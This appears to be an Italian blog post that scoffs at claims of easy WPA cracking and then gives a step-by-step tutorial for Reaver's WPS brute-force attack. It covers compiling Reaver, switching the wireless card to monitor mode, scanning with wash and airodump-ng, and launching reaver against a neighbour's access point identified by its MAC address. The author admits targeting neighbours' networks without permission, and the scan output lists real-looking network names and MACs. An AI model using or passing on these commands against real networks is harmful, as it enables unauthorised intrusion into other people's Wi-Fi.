http://www.bufferoverflow.it/2012/01/08/bucare-una-rete-wi-fi-protetta-con-ubuntu-usando-reaver/
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
Tempo fa' era uscito un'altro sistema (GERIX) ... leggete questo titolo ...
http://www.hackgeek.it/con-gerix-wifi-cracker-anche-mia-nonna-saprebbe-craccare-una-rete-wifi/
.... tanta fuffa, tanto copia incolla da un sito all'altro da un blog ad un'altro che hanno una cosa in comune oltre alla notizia. NESSUNO PRODUCE RISULTATI DI QUALI APPARATI RISULTINO VULNERABILI E IN QUALI CONDIZIONI.
Bene signori, sappiate che sono tutte fandonie !!!!!
Ho lasciato giorni i PC di casa e dell'ufficio a crackare le mie reti e quelle dei vicini ... senza l'ombra di alcun risultato positivo.... ... Altro che anche mia nonna riuscirebbe a crackare una rete WPA .... solo buoffonate....
Se volete cimentarvi, vi pubblico qui una guida completa che ha funzionato sia su Ubuntu 10.04 che su 11.10.
scaricate reaver dal sito: http://code.google.com/ p/reaver-wps/downloads/detail? name=reaver-1.4.tar.gz&can=2& q=
ed estraetelo.
Reaver và compilato ... per farlo:
------------------------------ ---------
sudo apt-get install build-essential
sudo apt-get install libpcap0.8-dev
sudo apt-get install libsqlite3-dev
cd ~/Scaricati/reaver-1.4/src
./configure
make
sudo make install
-----------------------------
Per comodità installate anche la suite aircrack-ng
con il comando:
-------------------
sudo apt-get install aircrack-ng
-------------------
pare che nelle prossime versioni di ubuntu il pacchetto non sarà più presente... sarà un casino compilarlo a mano xke bisogna indietreggiare la versione del compilatore c di sistema
questo il link del sorgente:
questo un cenno sulla versione del gcc:
Dopodiche' bisogna mettere l'interfaccia wireless in modo promiscuo. (quindi disabiliteremo la connettività)
------------------------------ ------------------------------ ---------
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
------------------------------ ------------------------------ -----
in alternativa si può usare (ma io non l'ho fatto .... tutti i comandi farebbero riferimento a mon0 anzichè wlan 0)
sudo airmon-ng start wlan0
Ora bisogna cercare le reti vulnerabili all'attacco reaver con la sua utility WASH
------------------------------ -------------------
sudo wash -i wlan0 --ignore-fcs
------------------------------ -------------------
Questo il risultato:
BSSID Channel RSSI WPS Version WPS Locked ESSID
------------------------------ ------------------------------ ------------------------------ ---------------------
C0:C1:C0:05:C6:A9 1 -89 1.0 No RossoSole
E0:91:F5:46:BF:22 6 -90 1.0 No Elio
02:BD:B9:E2:42:B2 1 -92 1.0 No dlink
D8:5D:4C:F5:16:27 4 -90 1.0 No TP-LINK_F51628
08:86:3B:57:23:10 6 -90 1.0 No belkin.310
Se volete vedere la differenza tra le reti e i client presenti in aria e gli AP vulnerabili bisogna usare AIRODUMP-NG
------------------------------ ----------------
sudo airodump-ng wlan0
CH 13 ][ Elapsed: 1 min ][ 2012-02-01 12:15
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:0C:42:61:4C:D5 -32 463 239 8 9 54 . WPA CCMP PSK APCavalieri
00:0C:42:94:93:CD -75 353 80 2 9 54 . WPA CCMP PSK APCavalieri
00:14:C1:2E:66:19 -86 52 0 0 11 54e. WEP WEP USR9111
00:E0:4D:90:F4:6C -88 14 0 0 11 54 WPA2 CCMP PSK InfostradaWiFi-001399
E0:91:F5:46:BF:22 -88 53 2 0 6 54e. WPA2 CCMP PSK Elio
1C:BD:B9:40:2C:0A -88 52 0 0 6 54e WPA2 CCMP PSK D-Link
C0:C1:C0:05:C6:A9 -89 46 0 0 1 54e WPA2 CCMP PSK RossoSole
08:86:3B:57:23:10 -89 7 0 0 6 54e WPA2 CCMP PSK belkin.310
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:08:CA:21:FA:FA -51 0 - 1 0 7
(not associated) 04:46:65:56:9B:60 -87 0 - 1 0 56 Alice-31436523,Alice- 36598782,FAS
(not associated) 3C:4A:92:AC:D9:86 -88 0 - 1 96 116 Alice-45008691
00:0C:42:61:4C:D5 D8:B3:77:16:8F:7F -1 11 - 0 0 3
00:0C:42:61:4C:D5 74:A7:22:E0:7D:84 -23 54 -54 0 10
00:0C:42:61:4C:D5 04:1E:64:BE:67:8C -61 5 - 1 0 35 APCavalieri
00:0C:42:61:4C:D5 DC:2B:61:68:D8:0E -63 1 -54 0 86
------------------------------ -----------------
Con questi dati, ho deciso di attaccare l'AP Rossosole ... quello col segnale relativamente migliore.. devo specificare il MAC del AP
------------------------------ -------
sudo reaver -i wlan0 -b C0:C1:C0:05:C6:A9 -vv
------------------------------ --------
Nessun commento:
Posta un commento